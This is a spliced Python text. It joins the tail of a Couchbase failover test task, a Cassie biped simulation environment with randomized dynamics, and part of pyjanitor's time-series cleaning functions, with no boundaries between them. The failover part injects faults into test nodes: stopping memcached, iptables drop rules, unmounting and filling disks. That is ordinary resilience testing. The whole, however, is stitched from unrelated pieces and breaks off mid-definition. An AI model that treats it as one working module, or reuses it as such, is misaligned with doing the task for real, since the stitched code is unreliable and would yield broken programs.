self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _stop_memcached(self, node):
node_failure_timer = self.failure_timers[self.itr]
self.task_manager.add_new_task(node_failure_timer)
time.sleep(2)
shell = RemoteMachineShellConnection(node)
o, r = shell.stop_memcached()
self.test_log.debug("Killed memcached. {0} {1}".format(o, r))
shell.disconnect()
self.task_manager.get_task_result(node_failure_timer)
self.start_time = node_failure_timer.start_time
def _start_memcached(self, node):
shell = RemoteMachineShellConnection(node)
o, r = shell.start_memcached()
self.test_log.debug("Started back memcached. {0} {1}".format(o, r))
shell.disconnect()
def _block_incoming_network_from_node(self, node1, node2):
shell = RemoteMachineShellConnection(node1)
self.test_log.debug("Adding {0} into iptables rules on {1}"
.format(node1.ip, node2.ip))
command = "iptables -A INPUT -s {0} -j DROP".format(node2.ip)
shell.execute_command(command)
shell.disconnect()
self.start_time = time.time()
def _fail_disk(self, node):
shell = RemoteMachineShellConnection(node)
output, error = shell.unmount_partition(self.disk_location)
success = True
if output:
for line in output:
if self.disk_location in line:
success = False
if success:
self.test_log.debug("Unmounted disk at location : {0} on {1}"
.format(self.disk_location, node.ip))
self.start_time = time.time()
else:
exception_str = "Could not fail the disk at {0} on {1}" \
.format(self.disk_location, node.ip)
self.test_log.error(exception_str)
self.set_exception(Exception(exception_str))
shell.disconnect()
def _recover_disk(self, node):
shell = RemoteMachineShellConnection(node)
o, r = shell.mount_partition(self.disk_location)
for line in o:
if self.disk_location in line:
self.test_log.debug("Mounted disk at location : {0} on {1}"
.format(self.disk_location, node.ip))
return
self.set_exception(Exception("Failed mount disk at location {0} on {1}"
.format(self.disk_location, node.ip)))
shell.disconnect()
raise Exception()
def _disk_full_failure(self, node):
shell = RemoteMachineShellConnection(node)
output, error = shell.fill_disk_space(self.disk_location, self.disk_size)
success = False
if output:
for line in output:
if self.disk_location in line:
if "0 100% {0}".format(self.disk_location) in line:
success = True
if success:
self.test_log.debug("Filled up disk Space at {0} on {1}"
.format(self.disk_location, node.ip))
self.start_time = time.time()
else:
self.test_log.debug("Could not fill the disk at {0} on {1}"
.format(self.disk_location, node.ip))
self.set_exception(Exception("Failed to fill disk at {0} on {1}"
.format(self.disk_location, node.ip)))
shell.disconnect()
def _recover_disk_full_failure(self, node):
shell = RemoteMachineShellConnection(node)
delete_file = "{0}/disk-quota.ext3".format(self.disk_location)
output, error = shell.execute_command("rm -f {0}".format(delete_file))
self.test_log.debug(output)
if error:
self.test_log.error(error)
shell.disconnect()
def _check_for_autofailover_initiation(self, failed_over_node):
rest = RestConnection(self.master)
ui_logs = rest.get_logs(10)
ui_logs_text = [t["text"] for t in ui_logs]
ui_logs_time = [t["serverTime"] for t in ui_logs]
expected_log = "Starting failing over ['ns_1@{}']".format(
failed_over_node.ip)
if expected_log in ui_logs_text:
failed_over_time = ui_logs_time[ui_logs_text.index(expected_log)]
return True, failed_over_time
return False, None
def _wait_for_autofailover_initiation(self, timeout):
autofailover_initated = False
while time.time() < timeout + self.start_time:
autofailover_initated, failed_over_time = \
self._check_for_autofailover_initiation(
self.current_failure_node)
if autofailover_initated:
end_time = self._get_mktime_from_server_time(failed_over_time)
time_taken = end_time - self.start_time
return autofailover_initated, time_taken
return autofailover_initated, -1
def _get_mktime_from_server_time(self, server_time):
time_format = "%Y-%m-%dT%H:%M:%S"
server_time = server_time.split('.')[0]
mk_time = time.mktime(time.strptime(server_time, time_format))
return mk_time
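    # For example (a sketch): a server time of "2021-03-04T05:06:07.890"
    # is truncated at the '.' to "2021-03-04T05:06:07" and then converted
    # to local epoch seconds via time.mktime.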
def _rebalance(self):
rest = RestConnection(self.master)
nodes = rest.node_statuses()
rest.rebalance(otpNodes=[node.id for node in nodes])
rebalance_progress = rest.monitorRebalance()
if not rebalance_progress:
self.set_result(False)
self.set_exception(Exception("Failed to rebalance after failover"))
def _check_if_rebalance_in_progress(self, timeout):
rest = RestConnection(self.master)
end_time = time.time() + timeout
while time.time() < end_time:
try:
rebalance_status, progress = \
rest._rebalance_status_and_progress()
if rebalance_status == "running":
continue
elif rebalance_status is None and progress == 100:
return False, -1
except RebalanceFailedException:
ui_logs = rest.get_logs(10)
ui_logs_text = [t["text"] for t in ui_logs]
ui_logs_time = [t["serverTime"] for t in ui_logs]
                rebalance_failure_log = "Rebalance exited with reason"
                for ui_log in ui_logs_text:
                    if rebalance_failure_log in ui_log:
rebalance_failure_time = ui_logs_time[
ui_logs_text.index(ui_log)]
failover_log = "Could not automatically fail over " \
"node ('ns_1@{}'). Rebalance is " \
"running.".format(
self.current_failure_node.ip)
if failover_log in ui_logs_text:
return True, self._get_mktime_from_server_time(
rebalance_failure_time)
else:
return False, -2
return False, -3
class NodeDownTimerTask(Task):
def __init__(self, node, port=None, timeout=300):
Task.__init__(self, "NodeDownTimerTask")
self.test_log.debug("Initializing NodeDownTimerTask")
self.node = node
self.port = port
self.timeout = timeout
self.start_time = 0
def call(self):
self.test_log.debug("Starting execution of NodeDownTimerTask")
end_task = time.time() + self.timeout
while not self.completed and time.time() < end_task:
if not self.port:
try:
self.start_time = time.time()
response = os.system("ping -c 1 {} > /dev/null".format(
self.node))
if response != 0:
self.test_log.debug(
"Injected failure in {}. Caught due to ping"
.format(self.node))
self.complete_task()
self.set_result(True)
break
except Exception as e:
self.test_log.warning("Unexpected exception: {}".format(e))
self.complete_task()
return True
try:
self.start_time = time.time()
socket.socket().connect(("{}".format(self.node), 8091))
socket.socket().close()
socket.socket().connect(("{}".format(self.node), 11210))
socket.socket().close()
except socket.error:
self.test_log.debug(
"Injected failure in {}. Caught due to ports"
.format(self.node))
self.complete_task()
return True
else:
try:
self.start_time = time.time()
socket.socket().connect(("{}".format(self.node),
int(self.port)))
socket.socket().close()
socket.socket().connect(("{}".format(self.node), 11210))
socket.socket().close()
except socket.error:
self.test_log.debug("Injected failure in {}"
.format(self.node))
self.complete_task()
return True
if time.time() >= end_task:
self.complete_task()
self.test_log.error("Could not inject failure in {}"
.format(self.node))
return False
class Atomicity(Task):
instances = 1
num_items = 10000
mutations = num_items
start_from = 0
op_type = "insert"
persist_to = 1
replicate_to = 1
task_manager = []
write_offset = []
def __init__(self, cluster, task_manager, bucket, client, clients, generator, op_type, exp, flag=0,
persist_to=0, replicate_to=0, time_unit="seconds",
only_store_hash=True, batch_size=1, pause_secs=1, timeout_secs=5, compression=True,
process_concurrency=8, print_ops_rate=True, retries=5,update_count=1, transaction_timeout=5,
commit=True, durability=None, sync=True, num_threads=5, record_fail=False):
super(Atomicity, self).__init__("AtomicityDocumentsLoadGenTask")
self.generators = generator
self.cluster = cluster
self.commit = commit
Atomicity.record_fail = record_fail
Atomicity.num_docs = num_threads
self.exp = exp
self.flag = flag
Atomicity.sync = sync
self.persit_to = persist_to
self.replicate_to = replicate_to
self.time_unit = time_unit
self.only_store_hash = only_store_hash
self.pause_secs = pause_secs
self.timeout_secs = timeout_secs
Atomicity.transaction_timeout = transaction_timeout
self.compression = compression
self.process_concurrency = process_concurrency
self.client = client
Atomicity.task_manager = task_manager
self.batch_size = batch_size
self.print_ops_rate = print_ops_rate
self.retries = retries
self.op_type = op_type
self.bucket = bucket
self.clients = clients
Atomicity.clients = clients[0]
Atomicity.generator = generator
Atomicity.updatecount = update_count
if durability == "MAJORITY":
Atomicity.durability = 1
elif durability == "MAJORITY_AND_PERSIST_ON_MASTER":
Atomicity.durability = 2
elif durability == "PERSIST_TO_MAJORITY":
Atomicity.durability = 3
elif durability == "ONLY_NONE":
Atomicity.durability = 4
else:
Atomicity.durability = 0
def call(self):
tasks = []
self.start_task()
iterator = 0
self.gen = []
if self.op_type == "time_out":
transaction_config = Transaction().createTransactionConfig(2, Atomicity.durability)
else:
self.test_log.info("transaction timeout is {}".format(Atomicity.transaction_timeout))
transaction_config = Transaction().createTransactionConfig(Atomicity.transaction_timeout, Atomicity.durability)
try:
self.transaction = Transaction().createTansaction(self.client.cluster, transaction_config)
self.test_log.info("transaction is {}".format(self.transaction))
except Exception as e:
self.set_exception(e)
for generator in self.generators:
tasks.extend(self.get_tasks(generator))
iterator += 1
self.test_log.debug("going to add new task")
for task in tasks:
Atomicity.task_manager.add_new_task(task)
for task in tasks:
Atomicity.task_manager.get_task_result(task)
self.transaction.close()
for con in self.clients:
for client in con:
client.close()
def get_tasks(self, generator):
generators = []
tasks = []
gen_start = int(generator.start)
gen_end = max(int(generator.end), 1)
gen_range = max(int((generator.end - generator.start)/self.process_concurrency), 1)
for pos in range(gen_start, gen_end, gen_range):
partition_gen = copy.deepcopy(generator)
partition_gen.start = pos
partition_gen.itr = pos
partition_gen.end = pos + gen_range
if partition_gen.end > generator.end:
partition_gen.end = generator.end
batch_gen = BatchedDocumentGenerator(
partition_gen,
self.batch_size)
generators.append(batch_gen)
for i in range(0, len(generators)):
task = self.Loader(self.cluster, self.bucket[i], self.client, generators[i], self.op_type,
self.exp, self.flag, persist_to=self.persit_to, replicate_to=self.replicate_to,
time_unit=self.time_unit, batch_size=self.batch_size,
pause_secs=self.pause_secs, timeout_secs=self.timeout_secs,
compression=self.compression,
instance_num = 1,transaction=self.transaction, commit=self.commit)
tasks.append(task)
return tasks
class Loader(GenericLoadingTask):
'''
1. Start inserting data into buckets
2. Keep updating the write offset
3. Start the reader thread
4. Keep track of non durable documents
'''
def __init__(self, cluster, bucket, client, generator, op_type, exp,
flag=0, persist_to=0, replicate_to=0, time_unit="seconds",
batch_size=1, pause_secs=1, timeout_secs=5,
compression=True, throughput_concurrency=4, retries=5,
instance_num=0, transaction=None, commit=True):
super(Atomicity.Loader, self).__init__(
cluster, bucket, client, batch_size=batch_size,
pause_secs=pause_secs,
timeout_secs=timeout_secs, compression=compression,
retries=retries, transaction=transaction, commit=commit)
self.generator = generator
self.op_type = []
self.op_type.extend(op_type.split(';'))
self.thread_name = "Atomicity_Loader_Task-{}_{}_{}" \
.format(generator._doc_gen.start,
generator._doc_gen.end,
op_type)
self.commit = commit
self.exp = exp
self.flag = flag
self.persist_to = persist_to
self.replicate_to = replicate_to
self.compression = compression
self.pause_secs = pause_secs
self.timeout_secs = timeout_secs
self.time_unit = time_unit
self.instance = instance_num
self.transaction = transaction
self.client = client
self.bucket = bucket
self.exp_unit = "seconds"
def has_next(self):
return self.generator.has_next()
def call(self):
self.start_task()
self.test_log.info("Starting Atomicity load generation thread")
exception = None
first_batch = {}
last_batch = {}
self.all_keys = []
self.update_keys = []
self.delete_keys = []
docs = []
self.keys_values = {}
doc_gen = self.generator
while self.has_next():
self.key_value = doc_gen.next_batch()
self._process_values_for_create(self.key_value)
self.all_keys.extend(self.key_value.keys())
self.keys_values.update(self.key_value)
for op_type in self.op_type:
if op_type == 'general_create':
for client in Atomicity.clients:
self.batch_create(
self.key_value, client,
persist_to=self.persist_to,
replicate_to=self.replicate_to,
timeout=self.timeout, time_unit=self.time_unit,
doc_type=self.generator.doc_type)
for key, value in self.key_value.items():
content = self.client.translate_to_json_object(value)
tuple = Tuples.of(key, content)
docs.append(tuple)
from .cassiemujoco import pd_in_t, state_out_t, CassieSim, CassieVis
from .trajectory import CassieTrajectory
from math import floor
import numpy as np
import os
import random
import pickle
class CassieEnv_rand_dyn:
def __init__(self, traj, simrate=60, clock_based=False, state_est=False):
self.sim = CassieSim("./cassie/cassiemujoco/cassie.xml")
self.vis = None
self.clock_based = clock_based
self.state_est = state_est
if clock_based:
self.observation_space = np.zeros(42)
if self.state_est:
self.observation_space = np.zeros(48) # Size for use with state est
else:
self.observation_space = np.zeros(80)
if self.state_est:
self.observation_space = np.zeros(86) # Size for use with state est
self.action_space = np.zeros(10)
dirname = os.path.dirname(__file__)
if traj == "walking":
traj_path = os.path.join(dirname, "trajectory", "stepdata.bin")
elif traj == "stepping":
traj_path = os.path.join(dirname, "trajectory", "more-poses-trial.bin")
self.trajectory = CassieTrajectory(traj_path)
self.P = np.array([100, 100, 88, 96, 50])
self.D = np.array([10.0, 10.0, 8.0, 9.6, 5.0])
self.u = pd_in_t()
# TODO: should probably initialize this to current state
self.cassie_state = state_out_t()
self.simrate = simrate # simulate X mujoco steps with same pd target
# 60 brings simulation from 2000Hz to roughly 30Hz
self.time = 0 # number of time steps in current episode
self.phase = 0 # portion of the phase the robot is in
self.counter = 0 # number of phase cycles completed in episode
# NOTE: a reference trajectory represents ONE phase cycle
# should be floor(len(traj) / simrate) - 1
# should be VERY cautious here because wrapping around the trajectory
# badly can cause asymmetrical/bad gaits
self.phaselen = floor(len(self.trajectory) / self.simrate) - 1
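# e.g. (hypothetical numbers): a 1,680-sample reference trajectory at
# simrate 60 gives phaselen = floor(1680 / 60) - 1 = 27, so phase runs
# 0..27 and wraps on the 28th policy step.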
# see include/cassiemujoco.h for meaning of these indices
self.pos_idx = [7, 8, 9, 14, 20, 21, 22, 23, 28, 34]
self.vel_idx = [6, 7, 8, 12, 18, 19, 20, 21, 25, 31]
self.speed = 0
# maybe make ref traj only send relevant idxs?
ref_pos, ref_vel = self.get_ref_state(self.phase)
self.prev_action = ref_pos[self.pos_idx]
self.phase_add = 1
# Record default dynamics parameters
self.default_damping = self.sim.get_dof_damping()
self.default_mass = self.sim.get_body_mass()
self.default_ipos = self.sim.get_body_ipos()
#print(self.default_damping)
#print(self.default_mass)
#print(self.default_ipos)
#input()
def step_simulation(self, action):
# maybe make ref traj only send relevant idxs?
ref_pos, ref_vel = self.get_ref_state(self.phase + self.phase_add)
target = action + ref_pos[self.pos_idx]
self.u = pd_in_t()
for i in range(5):
# TODO: move setting gains out of the loop?
# maybe write a wrapper for pd_in_t ?
self.u.leftLeg.motorPd.pGain[i] = self.P[i]
self.u.rightLeg.motorPd.pGain[i] = self.P[i]
self.u.leftLeg.motorPd.dGain[i] = self.D[i]
self.u.rightLeg.motorPd.dGain[i] = self.D[i]
self.u.leftLeg.motorPd.torque[i] = 0 # Feedforward torque
self.u.rightLeg.motorPd.torque[i] = 0
self.u.leftLeg.motorPd.pTarget[i] = target[i]
self.u.rightLeg.motorPd.pTarget[i] = target[i + 5]
self.u.leftLeg.motorPd.dTarget[i] = 0
self.u.rightLeg.motorPd.dTarget[i] = 0
self.cassie_state = self.sim.step_pd(self.u)
def step(self, action):
for _ in range(self.simrate):
self.step_simulation(action)
height = self.sim.qpos()[2]
self.time += 1
self.phase += self.phase_add
if self.phase > self.phaselen:
self.phase = 0
self.counter += 1
# Early termination
done = not (0.4 < height < 3.0)
reward = self.compute_reward()
# TODO: make 0.3 a variable/more transparent
if reward < 0.3:
done = True
return self.get_full_state(), reward, done, {}
def reset(self, randomize=True):
# Randomize dynamics:
if randomize:
damp = self.default_damping
weak_factor = 1
strong_factor = 1
pelvis_damp_range = [[damp[0], damp[0]], [damp[1], damp[1]], [damp[2], damp[2]], [damp[3], damp[3]], [damp[4], damp[4]], [damp[5], damp[5]]] # 0->5
hip_damp_range = [[damp[6]/weak_factor, damp[6]*weak_factor], [damp[7]/weak_factor, damp[7]*weak_factor], [damp[8]/weak_factor, damp[8]*weak_factor]] # 6->8 and 19->21
achilles_damp_range = [[damp[9]/weak_factor, damp[9]*weak_factor], [damp[10]/weak_factor, damp[10]*weak_factor], [damp[11]/weak_factor, damp[11]*weak_factor]] # 9->11 and 22->24
knee_damp_range = [[damp[12]/weak_factor, damp[12]*weak_factor]] # 12 and 25
shin_damp_range = [[damp[13]/weak_factor, damp[13]*weak_factor]] # 13 and 26
tarsus_damp_range = [[damp[14], damp[14]*strong_factor]] # 14 and 27
heel_damp_range = [[damp[15], damp[15]]] # 15 and 28
fcrank_damp_range = [[damp[16]/weak_factor, damp[16]*weak_factor]] # 16 and 29
prod_damp_range = [[damp[17], damp[17]]] # 17 and 30
foot_damp_range = [[damp[18]/weak_factor, damp[18]*weak_factor]] # 18 and 31
side_damp = hip_damp_range + achilles_damp_range + knee_damp_range + shin_damp_range + tarsus_damp_range + heel_damp_range + fcrank_damp_range + prod_damp_range + foot_damp_range
damp_range = pelvis_damp_range + side_damp + side_damp
damp_noise = [np.random.uniform(a, b) for a, b in damp_range]
print(damp_noise - self.default_damping)
#nbody layout:
# 0: worldbody (zero)
# 1: pelvis
# 2: left hip roll
# 3: left hip yaw
# 4: left hip pitch
# 5: left achilles rod
# 6: left knee
# 7: left knee spring
# 8: left shin
# 9: left tarsus
# 10: left heel spring
# 11: left foot crank
# 12: left plantar rod
# 13: left foot
# 14: right hip roll
# 15: right hip yaw
# 16: right hip pitch
# 17: right achilles rod
# 18: right knee
# 19: right knee spring
# 20: right shin
# 21: right tarsus
# 22: right heel spring
# 23: right foot crank
# 24: right plantar rod
# 25: right foot
hi = 1.2
lo = 0.8
m = self.default_mass
pelvis_mass_range = [[lo*m[1], hi*m[1]]] # 1
hip_mass_range = [[lo*m[2], hi*m[2]], # 2->4 and 14->16
[lo*m[3], hi*m[3]],
[lo*m[4], hi*m[4]]]
achilles_mass_range = [[lo*m[5], hi*m[5]]] # 5 and 17
knee_mass_range = [[lo*m[6], hi*m[6]]] # 6 and 18
knee_spring_mass_range = [[lo*m[7], hi*m[7]]] # 7 and 19
shin_mass_range = [[lo*m[8], hi*m[8]]] # 8 and 20
tarsus_mass_range = [[lo*m[9], hi*m[9]]] # 9 and 21
heel_spring_mass_range = [[lo*m[10], hi*m[10]]] # 10 and 22
fcrank_mass_range = [[lo*m[11], hi*m[11]]] # 11 and 23
prod_mass_range = [[lo*m[12], hi*m[12]]] # 12 and 24
foot_mass_range = [[lo*m[13], hi*m[13]]] # 13 and 25
side_mass = hip_mass_range + achilles_mass_range + knee_mass_range + knee_spring_mass_range + shin_mass_range + tarsus_mass_range + heel_spring_mass_range + fcrank_mass_range + prod_mass_range + foot_mass_range
mass_range = [[0, 0]] + pelvis_mass_range + side_mass + side_mass
mass_noise = [np.random.uniform(a, b) for a, b in mass_range]
delta = 0.001
com_noise = [0, 0, 0] + [self.default_ipos[i] + np.random.uniform(-delta, delta) for i in range(3, len(self.default_ipos))]
"""
pelvis_com_range = [[0.05066, 0.05066], [0.000346, 0.000346], [0.02841, 0.02841]] # 3->5
left_hip_com_range = [[-0.01793, -0.01793], [0.0001, 0.0001], [-0.04428, -0.04428], [0.0, 0.0], [-1e-5, -1e-5], [-0.034277, -0.034277], [0.05946, 0.05946], [0.00005, 0.00005], [-0.03581, -0.03581]] # 6->14
right_hip_com_range = [[-0.01793, -0.01793], [0.0001, 0.0001], [-0.04428, -0.04428], [0.0, 0.0], [ 1e-5, 1e-5], [-0.034277, -0.034277], [0.05946, 0.05946], [0.00005, 0.00005], [ 0.03581, 0.03581]] # 42->50
achilles_com_range = [[0.24719, 0.24719], [0.0, 0.0], [0.0, 0.0]] # 15->17 and 51->53
left_knee_com_range = [[0.023, 0.023], [0.03207, 0.03207], [-0.002181, -0.002181]] # 18->20
right_knee_com_range = [[0.023, 0.023], [0.03207, 0.03207], [ 0.002181, 0.002181]] # 54->56
knee_spring_com_range = [[0.0836, 0.0836], [0.0034, 0.0034], [0.0, 0.0]] # 21->23 and 57->59
left_shin_com_range = [[0.18338, 0.18338], [0.001169, 0.001169], [ 0.0002123, 0.0002123]] # 24->26
right_shin_com_range = [[0.18338, 0.18338], [0.001169, 0.001169], [-0.0002123, -0.0002123]] # 60->62
left_tarsus_com_range = [[0.11046, 0.11046], [-0.03058, -0.03058], [-0.00131, -0.00131]] # 27->29
right_tarsus_com_range = [[0.11046, 0.11046], [-0.03058, -0.03058], [ 0.00131, 0.00131]] # 63->65
heel_com_range = [[0.081, 0.081], [0.0022, 0.0022], [0.0, 0.0]] # 30->32 and 66->68
left_fcrank_com_range = [[0.00493, 0.00493], [0.00002, 0.00002], [-0.00215, -0.00215]] # 33->35 and 69->71
right_fcrank_com_range = [[0.00493, 0.00493], [0.00002, 0.00002], [ 0.00215, 0.00215]] # 33->35 and 69->71
prod_com_range = [[0.17792, 0.17792], [0.0, 0.0], [0.0, 0.0]] # 36->38 and 72->74
left_foot_com_range = [[0.00474, 0.00474], [0.02748, 0.02748], [-0.00014, -0.00014]] # 39->41 and 75->77
right_foot_com_range = [[0.00474, 0.00474], [0.02748, 0.02748], [ 0.00014, 0.00014]] # 39->41 and 75->77
left_com = left_hip_com_range + achilles_com_range + left_knee_com_range + knee_spring_com_range + left_shin_com_range + left_tarsus_com_range + heel_com_range + left_fcrank_com_range + prod_com_range + left_foot_com_range
right_com = right_hip_com_range + achilles_com_range + right_knee_com_range + knee_spring_com_range + right_shin_com_range + right_tarsus_com_range + heel_com_range + right_fcrank_com_range + prod_com_range + right_foot_com_range
com_range = [[0, 0], [0, 0], [0, 0]] + pelvis_com_range + left_com + right_com
com_noise = [np.random.uniform(a, b) for a, b in com_range]
"""
self.sim.set_dof_damping(np.clip(damp_noise, 0, None))
self.sim.set_body_mass(np.clip(mass_noise, 0, None))
self.sim.set_body_ipos(np.clip(com_noise, 0, None))
self.phase = random.randint(0, self.phaselen)
self.time = 0
self.counter = 0
qpos, qvel = self.get_ref_state(self.phase)
self.sim.set_qpos(qpos)
self.sim.set_qvel(qvel)
# Need to reset u? Or better way to reset cassie_state than taking step
self.cassie_state = self.sim.step_pd(self.u)
self.speed = (random.randint(0, 10)) / 10
# maybe make ref traj only send relevant idxs?
ref_pos, ref_vel = self.get_ref_state(self.phase)
self.prev_action = ref_pos[self.pos_idx]
return self.get_full_state()
# used for plotting against the reference trajectory
def reset_for_test(self):
self.phase = 0
self.time = 0
self.counter = 0
qpos, qvel = self.get_ref_state(self.phase)
self.sim.set_qpos(qpos)
self.sim.set_qvel(qvel)
# maybe make ref traj only send relevant idxs?
ref_pos, ref_vel = self.get_ref_state(self.phase)
self.prev_action = ref_pos[self.pos_idx]
# Need to reset u? Or better way to reset cassie_state than taking step
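# A hedged usage sketch of this environment (assumes the trajectory binaries
# referenced in __init__ exist; argument names match the constructor above):
#
#   env = CassieEnv_rand_dyn("walking", simrate=60, clock_based=True)
#   obs = env.reset()  # dynamics (damping/mass/COM) re-randomized here
#   for _ in range(100):
#       obs, reward, done, _ = env.step(np.zeros(10))
#       if done:
#           obs = env.reset()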
# janitor/timeseries.py
""" Time series-specific data cleaning functions. """
import itertools
from typing import Dict, Union
import pandas as pd
import pandas_flavor as pf
from janitor import check
from .errors import JanitorError
@pf.register_dataframe_method
def fill_missing_timestamps(
df: pd.DataFrame,
frequency: str,
first_time_stamp: pd.Timestamp = None,
last_time_stamp: pd.Timestamp = None,
) -> pd.DataFrame:
"""
Fill dataframe with missing timestamps based on a defined frequency.
If timestamps are missing,
this function will reindex the dataframe.
If timestamps are not missing,
then the function will return the dataframe unmodified.
Functional usage example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = pd.DataFrame(...)
df = janitor.timeseries.fill_missing_timestamps(
df=df,
frequency="1H",
)
Method chaining example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = (
pd.DataFrame(...)
.fill_missing_timestamps(frequency="1H")
)
:param df: Dataframe which needs to be tested for missing timestamps
:param frequency: frequency i.e. sampling frequency of the data.
Acceptable frequency strings are listed
`here <https://pandas.pydata.org/pandas-docs/stable/>`_
(see the offset aliases in the time series section of the user guide).
:param first_time_stamp: timestamp expected to start from.
Defaults to None.
If no input is provided, assumes the minimum value in time_series.
:param last_time_stamp: timestamp expected to end with.
Defaults to None.
If no input is provided, assumes the maximum value in time_series.
:returns: dataframe that has a complete set of contiguous datetimes.
"""
# Check all the inputs are the correct data type
check("frequency", frequency, [str])
check("first_time_stamp", first_time_stamp, [pd.Timestamp, type(None)])
check("last_time_stamp", last_time_stamp, [pd.Timestamp, type(None)])
if first_time_stamp is None:
first_time_stamp = df.index.min()
if last_time_stamp is None:
last_time_stamp = df.index.max()
# Generate expected timestamps
expected_timestamps = pd.date_range(
start=first_time_stamp, end=last_time_stamp, freq=frequency
)
return df.reindex(expected_timestamps)
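# A hedged usage sketch (hypothetical data): an hourly frame missing its
# 02:00 row gets that row back as NaNs after reindexing.
#
#   idx = pd.to_datetime(
#       ["2020-01-01 00:00", "2020-01-01 01:00", "2020-01-01 03:00"])
#   df = pd.DataFrame({"value": [1, 2, 4]}, index=idx)
#   filled = fill_missing_timestamps(df, frequency="1H")
#   # filled.index -> 00:00, 01:00, 02:00, 03:00; the 02:00 row is all NaN.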
def _get_missing_timestamps(
df: pd.DataFrame,
frequency: str,
first_time_stamp: pd.Timestamp = None,
last_time_stamp: pd.Timestamp = None,
) -> pd.DataFrame:
"""
Return the timestamps that are missing in a dataframe.
This function takes in a dataframe,
and checks its index against a dataframe
that contains the expected timestamps.
Here, we assume that the expected timestamps
are going to be of a larger size
than the timestamps available in the input dataframe ``df``.
If there are any missing timestamps in the input dataframe,
this function will return those missing timestamps
from the expected dataframe.
"""
expected_df = df.fill_missing_timestamps(
frequency, first_time_stamp, last_time_stamp
)
missing_timestamps = expected_df.index.difference(df.index)
return expected_df.loc[missing_timestamps]
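# Continuing the sketch above, this helper isolates just the gap:
#
#   missing = _get_missing_timestamps(df, "1H")
#   # -> a one-row (all-NaN) frame indexed at 2020-01-01 02:00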
@pf.register_dataframe_method
def sort_timestamps_monotonically(
df: pd.DataFrame, direction: str = "increasing", strict: bool = False
) -> pd.DataFrame:
"""
Sort dataframe such that index is monotonic.
If timestamps are monotonic,
this function will return the dataframe unmodified.
If timestamps are not monotonic,
then the function will sort the dataframe.
Functional usage example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = pd.DataFrame(...)
df = janitor.timeseries.sort_timestamps_monotonically(
direction="increasing"
)
Method chaining example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = (
pd.DataFrame(...)
.sort_timestamps_monotonically(direction="increasing")
)
:param df: Dataframe which needs to be tested for monotonicity
:param direction: type of monotonicity desired.
Acceptable arguments are:
1. increasing
2. decreasing
:param strict: flag to enable/disable strict monotonicity.
If set to True,
will remove duplicates in the index,
by retaining first occurrence of value in index.
If set to False,
will not test for duplicates in the index.
Defaults to False.
:returns: Dataframe that has monotonically increasing
(or decreasing) timestamps.
"""
# Check all the inputs are the correct data type
check("df", df, [pd.DataFrame])
check("direction", direction, [str])
check("strict", strict, [bool])
# Remove duplicates if requested
if strict:
df = df[~df.index.duplicated(keep="first")]
# Sort timestamps
if direction == "increasing":
df = df.sort_index()
else:
df = df.sort_index(ascending=False)
# Return the dataframe
return df
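# A hedged example (hypothetical frame): out-of-order timestamps are sorted,
# and strict=True drops duplicate index entries, keeping the first occurrence.
#
#   idx = pd.to_datetime(["2020-01-02", "2020-01-01", "2020-01-01"])
#   df = pd.DataFrame({"value": [3, 1, 2]}, index=idx)
#   df.sort_timestamps_monotonically(direction="increasing", strict=True)
#   # -> rows indexed 2020-01-01 (value 1), then 2020-01-02 (value 3)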
def _flag_jumps_single_col(
df: pd.DataFrame,
col: str,
scale: str,
direction: str,
threshold: Union[int, float],
) -> pd.Series:
"""
Creates a boolean column that flags whether or not the change
between consecutive rows in the provided dataframe column exceeds a
provided threshold.
Comparisons are always performed utilizing a GREATER THAN
threshold check. Thus, flags correspond to values that EXCEED
the provided threshold.
The method used to create consecutive row comparisons is set by the
`scale` argument. A `scale=absolute` corresponds to a difference
method (`.diff()`) and a `scale=percentage` corresponds to a
percentage change method (`.pct_change()`).
A `direction` argument is used to determine how to handle the sign
of the difference or percentage change methods.
A `direction=increasing` will only consider consecutive rows that
are increasing in value and exceeding the provided threshold.
A `direction=decreasing` will only consider consecutive rows that
are decreasing in value and exceeding the provided threshold.
If `direction=any`, the absolute value is taken for both the
difference method and the percentage change method, and the sign
of the change between consecutive rows is ignored.
"""
check("scale", scale, [str])
check("direction", direction, [str])
check("threshold", threshold, [int, float])
scale_types = ["absolute", "percentage"]
if scale not in scale_types:
raise JanitorError(
f"Unrecognized scale: '{scale}'. Must be one of: {scale_types}."
)
direction_types = ["increasing", "decreasing", "any"]
if direction not in direction_types:
raise JanitorError(
f"Unrecognized direction: '{direction}'. "
+ f"Must be one of: {direction_types}."
)
if threshold < 0:
raise JanitorError(
f"Unrecognized threshold: {threshold}. "
+ "This value must be >= 0.0. "
+ "Use 'direction' to specify positive or negative intent."
)
single_col = df[col]
single_col_diffs = single_col.diff()
if scale == "percentage":
single_col_pcts = single_col.pct_change()
if direction == "increasing":
# Using diffs ensures correct sign is used for incr/decr
# (see issue #711)
out = (single_col_diffs > 0) & (single_col_pcts.abs() > threshold)
elif direction == "decreasing":
# Using diffs ensures correct sign is used for incr/decr
# (see issue #711)
out = (single_col_diffs < 0) & (single_col_pcts.abs() > threshold)
else:
out = single_col_pcts.abs() > threshold
else:
if direction == "increasing":
out = single_col_diffs > threshold
elif direction == "decreasing":
out = (single_col_diffs < 0) & (single_col_diffs.abs() > threshold)
else:
out = single_col_diffs.abs() > threshold
out = out.astype(int)
return out
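# Worked example (hypothetical values) of the flag logic above:
#
#   s = pd.Series([1.0, 3.0, 2.0, 6.0])
#   s.diff()            # -> [NaN, 2.0, -1.0, 4.0]
#   scale="absolute", direction="increasing", threshold=1.5
#       -> flags [0, 1, 0, 1]   (only the +2.0 and +4.0 jumps qualify)
#   scale="percentage", direction="any", threshold=0.75
#       -> s.pct_change().abs() ~ [NaN, 2.0, 0.33, 2.0] -> flags [0, 1, 0, 1]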
@pf.register_dataframe_method
def flag_jumps(
df: pd.DataFrame,
scale: Union[str, Dict[str, str]] = "percentage",
direction: Union[str, Dict[str, str]] = "any",
threshold: Union[int, float, Dict[str, Union[int, float]]] = 0.0,
strict: bool = False,
) -> pd.DataFrame:
"""
Create boolean column(s) that flag whether or not the change
between consecutive rows exceeds a provided threshold.
Functional usage example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = pd.DataFrame(...)
df = flag_jumps(
df=df,
scale="absolute",
direction="any",
threshold=2,
)
Method chaining example:
.. code-block:: python
import pandas as pd
import janitor.timeseries
df = (
pd.DataFrame(...)
.flag_jumps(
